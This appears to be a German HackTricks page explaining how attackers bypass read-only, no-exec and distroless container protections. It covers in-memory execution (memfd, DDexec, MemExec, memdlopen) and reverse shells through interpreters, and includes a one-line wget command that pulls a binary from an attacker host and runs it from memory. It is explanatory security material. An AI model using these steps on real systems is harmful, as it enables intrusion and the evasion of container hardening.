Bypass FS protections: read-only / no-exec / Distroless

Support HackTricks

Wenn du an einer Hacking-Karriere interessiert bist und das Unhackbare hacken möchtest - wir stellen ein! (fließend Polnisch in Wort und Schrift erforderlich).

Videos

In den folgenden Videos findest du die auf dieser Seite erwähnten Techniken ausführlicher erklärt:

read-only / no-exec Szenario

Es ist immer häufiger anzutreffen, dass Linux-Maschinen mit read-only (ro) Dateisystemschutz gemountet werden, insbesondere in Containern. Das liegt daran, dass es so einfach ist, einen Container mit ro Dateisystem zu betreiben, wie readOnlyRootFilesystem: true im securitycontext festzulegen:

apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
      readOnlyRootFilesystem: true
    command: ["sh", "-c", "while true; do sleep 1000; done"]

Allerdings, selbst wenn das Dateisystem als ro gemountet ist, ist /dev/shm weiterhin beschreibbar, sodass es falsch ist zu sagen, dass wir nichts auf die Festplatte schreiben können. Diese Ordner werden jedoch mit no-exec-Schutz gemountet, sodass du eine hier heruntergeladene Binärdatei nicht ausführen kannst.

Aus der Perspektive eines Red Teams macht dies das Herunterladen und Ausführen von Binärdateien, die sich nicht bereits im System befinden (wie Backdoors oder Aufzähler wie kubectl), kompliziert.

Einfachster Bypass: Skripte

Beachte, dass ich von Binärdateien gesprochen habe, du kannst jedes Skript ausführen, solange der Interpreter auf der Maschine vorhanden ist, wie ein Shell-Skript, wenn sh vorhanden ist, oder ein Python-Skript, wenn Python installiert ist.

Allerdings reicht das nicht aus, um deine Binär-Backdoor oder andere Binärwerkzeuge auszuführen, die du möglicherweise benötigst.

Speicher-Bypässe

Wenn du eine Binärdatei ausführen möchtest, aber das Dateisystem dies nicht zulässt, ist der beste Weg, dies zu tun, indem du sie aus dem Speicher ausführst, da die Schutzmaßnahmen dort nicht gelten.

FD + exec syscall Bypass

Wenn du einige leistungsstarke Skript-Engines auf der Maschine hast, wie Python, Perl oder Ruby, könntest du die Binärdatei herunterladen, um sie aus dem Speicher auszuführen, sie in einem Speicher-Dateideskriptor (create_memfd syscall) speichern, der nicht durch diese Schutzmaßnahmen geschützt ist, und dann einen exec syscall aufrufen, der den fd als die auszuführende Datei angibt.

Dafür kannst du leicht das Projekt fileless-elf-exec verwenden. Du kannst ihm eine Binärdatei übergeben, und es wird ein Skript in der angegebenen Sprache generiert, mit der Binärdatei komprimiert und b64 codiert und den Anweisungen, um sie in einem fd zu dekodieren und zu dekomprimieren, das durch den Aufruf des create_memfd syscalls erstellt wird, und einem Aufruf des exec syscalls, um sie auszuführen.

Dies funktioniert nicht in anderen Skriptsprache wie PHP oder Node, da sie keinen default Weg haben, rohe syscalls aus einem Skript aufzurufen, sodass es nicht möglich ist, create_memfd aufzurufen, um den Speicher fd zu erstellen, um die Binärdatei zu speichern.

Darüber hinaus wird das Erstellen eines regulären fd mit einer Datei in /dev/shm nicht funktionieren, da du sie nicht ausführen darfst, weil der no-exec-Schutz gilt.

DDexec / EverythingExec

DDexec / EverythingExec ist eine Technik, die es dir ermöglicht, den Speicher deines eigenen Prozesses zu modifizieren, indem du dessen /proc/self/mem überschreibst.

Daher kannst du, indem du den Assembly-Code kontrollierst, der vom Prozess ausgeführt wird, einen Shellcode schreiben und den Prozess "mutieren", um beliebigen Code auszuführen.

DDexec / EverythingExec ermöglicht es dir, deinen eigenen Shellcode oder jede Binärdatei aus dem Speicher zu laden und auszuführen.

# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar

Für weitere Informationen zu dieser Technik, siehe das Github oder:

DDexec / EverythingExec

MemExec

Memexec ist der natürliche nächste Schritt von DDexec. Es ist ein DDexec Shellcode, der demonisiert wurde, sodass Sie jedes Mal, wenn Sie eine andere Binärdatei ausführen möchten, DDexec nicht neu starten müssen. Sie können einfach den Memexec-Shellcode über die DDexec-Technik ausführen und dann mit diesem Daemon kommunizieren, um neue Binärdateien zu laden und auszuführen.

Ein Beispiel, wie man memexec verwendet, um Binärdateien von einem PHP-Reverse-Shell auszuführen, finden Sie unter https://github.com/arget13/memexec/blob/main/a.php.

Memdlopen

Mit einem ähnlichen Zweck wie DDexec ermöglicht die memdlopen Technik eine einfachere Möglichkeit, Binärdateien im Speicher zu laden, um sie später auszuführen. Es könnte sogar ermöglichen, Binärdateien mit Abhängigkeiten zu laden.

Distroless Bypass

Was ist distroless

Distroless-Container enthalten nur die minimalen Komponenten, die notwendig sind, um eine bestimmte Anwendung oder einen Dienst auszuführen, wie Bibliotheken und Laufzeitabhängigkeiten, schließen jedoch größere Komponenten wie einen Paketmanager, eine Shell oder Systemdienstprogramme aus.

Das Ziel von Distroless-Containern ist es, die Angriffsfläche von Containern zu reduzieren, indem unnötige Komponenten eliminiert und die Anzahl der ausnutzbaren Schwachstellen minimiert wird.

Reverse Shell

In einem Distroless-Container finden Sie möglicherweise nicht einmal sh oder bash, um eine reguläre Shell zu erhalten. Sie werden auch keine Binärdateien wie ls, whoami, id... finden, alles, was Sie normalerweise in einem System ausführen.

Daher werden Sie nicht in der Lage sein, eine Reverse Shell zu erhalten oder das System wie gewohnt zu enumerieren.

Wenn der kompromittierte Container jedoch beispielsweise eine Flask-Webanwendung ausführt, ist Python installiert, und daher können Sie eine Python-Reverse-Shell erhalten. Wenn es Node ausführt, können Sie eine Node-Reverse-Shell erhalten, und dasselbe gilt für die meisten Skriptsprache.

Mit der Skriptsprache könnten Sie das System enumerieren, indem Sie die Sprachfähigkeiten nutzen.

Wenn es keine read-only/no-exec-Schutzmaßnahmen gibt, könnten Sie Ihre Reverse Shell missbrauchen, um Ihre Binärdateien im Dateisystem zu schreiben und sie auszuführen.

In dieser Art von Containern werden diese Schutzmaßnahmen jedoch normalerweise vorhanden sein, aber Sie könnten die vorherigen Techniken zur Ausführung im Speicher verwenden, um sie zu umgehen.

Sie finden Beispiele, wie man einige RCE-Schwachstellen ausnutzt, um Skriptsprache Reverse Shells zu erhalten und Binärdateien aus dem Speicher auszuführen, unter https://github.com/carlospolop/DistrolessRCE.

Wenn Sie an einer Hacking-Karriere interessiert sind und das Unhackbare hacken möchten - wir stellen ein! (fließend Polnisch in Wort und Schrift erforderlich).

Support HackTricks

Last updated